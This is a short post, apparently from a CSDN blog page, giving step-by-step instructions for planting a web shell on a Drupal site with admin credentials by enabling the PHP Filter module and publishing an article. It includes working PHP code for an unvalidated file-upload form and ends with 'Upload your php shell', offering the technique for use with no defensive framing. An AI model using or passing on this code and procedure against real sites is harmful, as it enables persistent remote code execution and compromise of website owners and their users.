Drupal - upload shell with admin privilege

  1. login drupal with admin username and password.
  2. enable PHP Filter
  3. Add content with PHP Code
<?php
if(isset($_POST['Submit']))
{
    $filedir = ""; 
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];

    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

    echo"<center><b>Done ==> $userfile_name</b></center>";
    }
}
else{
echo'<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>'; }?>

Enable PHP Filter (Modules Settings), and save it.

Enable PHP Filter


Add a new article with PHP Code format, and POST it.

Add content with PHP Code


Go to Drupal home page, and you can find upload page.

PHP Code Executes


Upload your php shell.

PHP Shell

相关推荐
©️2020 CSDN 皮肤主题: 编程工作室 设计师:CSDN官方博客 返回首页